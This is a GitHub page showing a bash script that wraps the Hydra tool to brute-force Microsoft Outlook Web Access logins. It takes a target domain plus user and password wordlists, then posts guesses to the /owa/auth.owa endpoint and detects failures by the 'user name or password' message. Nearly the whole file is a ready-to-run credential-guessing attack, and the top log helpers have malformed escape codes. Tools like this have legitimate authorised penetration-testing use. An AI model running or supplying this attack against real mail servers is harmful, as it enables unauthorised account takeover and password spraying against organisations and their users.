forked from p0dalirius/owabrute
-
Notifications
You must be signed in to change notification settings - Fork 0
/
owabrute.sh
89 lines (76 loc) · 3.67 KB
/
owabrute.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
#!/usr/bin/env bash
log() { echo -e "x1b[1m[x1b[93mLOGx1b[0mx1b[1m]x1b[0m ${@}"; }
info() { echo -e "x1b[1m[x1b[92mINFOx1b[0mx1b[1m]x1b[0m ${@}"; }
warn() { echo -e "x1b[1m[x1b[91mWARNx1b[0mx1b[1m]x1b[0m ${@}"; }
HEADER="
██████╗ ██╗ ██╗ █████╗ ██████╗ ██████╗ ██╗ ██╗████████╗███████╗
██╔═══██╗██║ ██║██╔══██╗ ██╔══██╗██╔══██╗██║ ██║╚══██╔══╝██╔════╝
██║ ██║██║ █╗ ██║███████║ ██████╔╝██████╔╝██║ ██║ ██║ █████╗
██║ ██║██║███╗██║██╔══██║ ██╔══██╗██╔══██╗██║ ██║ ██║ ██╔══╝
╚██████╔╝╚███╔███╔╝██║ ██║ ██████╔╝██║ ██║╚██████╔╝ ██║ ███████╗
╚═════╝ ╚══╝╚══╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚══════╝
Hydra wrapper for bruteforcing Microsoft OWA.
"
owabrute(){
if [[ $# -ne 3 ]]; then
echo "Usage : owabrute DOMAIN USERSLIST PASSLIST"
else
if [[ $(which hydra) == "" ]]; then
echo -e "\x1b[1m[\x1b[91mWARN\x1b[0m\x1b[1m]\x1b[0m hydra not found. Install it with apt install hydra."
else
local DOMAIN="${1}"
local USERSLIST="${2}"
local PASSLIST="${3}"
hydra -V \
-L "${USERSLIST}" \
-e s \
-P "${PASSLIST}" \
"${DOMAIN}" \
https-post-form "/owa/auth.owa:flags=4&destination=https\://${DOMAIN}/owa/&forcedownlevel=0&username=^USER^&password=^PASS^&isUtf8=1:F=The user name or password"
fi
fi
}
usage(){
echo "Usage : ./owabruter.sh"
echo " -d DOMAIN : Target domain. Example : remote.targethost.co.uk"
echo " -u USERSLIST : Path to wordlist of users to test"
echo " -p PASSLIST : Path to wordlist of passwords to test"
}
#===============================================================================
if [[ $# -lt 2 || $# -gt 6 ]]; then
usage
else
DOMAIN=""
USERSLIST=""
PASSLIST=""
while getopts d:u:p:h: option; do
case "${option}" in
d) DOMAIN="${OPTARG}";;
u) USERSLIST="${OPTARG}";;
p) PASSLIST="${OPTARG}";;
h) usage;;
esac
done
if [[ "${DOMAIN}" == "" ]] || [[ "${USERSLIST}" == "" ]] || [[ "${PASSLIST}" == "" ]]; then
usage
else
echo "${HEADER}"
echo -e "DOMAIN : \x1b[1;92m${DOMAIN}\x1b[0m"
if [[ -f "${USERSLIST}" ]]; then
echo -e "USERSLIST : \x1b[1;92m${USERSLIST}\x1b[0m"
else
echo -e "USERSLIST : \x1b[1;91m${USERSLIST}\x1b[0m (Could not access ressource)"
fi
if [[ -f "${PASSLIST}" ]]; then
echo -e "PASSLIST : \x1b[1;92m${PASSLIST}\x1b[0m"
else
echo -e "PASSLIST : \x1b[1;91m${PASSLIST}\x1b[0m (Could not access ressource)"
fi
echo ""
if [ ! -f "${USERSLIST}" ] || [ ! -f "${PASSLIST}" ]; then
echo -e "\x1b[1m[\x1b[91mWARN\x1b[0m\x1b[1m]\x1b[0m Some resources could not be accessed. Aborting..."
else
owabrute "${DOMAIN}" "${USERSLIST}" "${PASSLIST}"
fi
fi
fi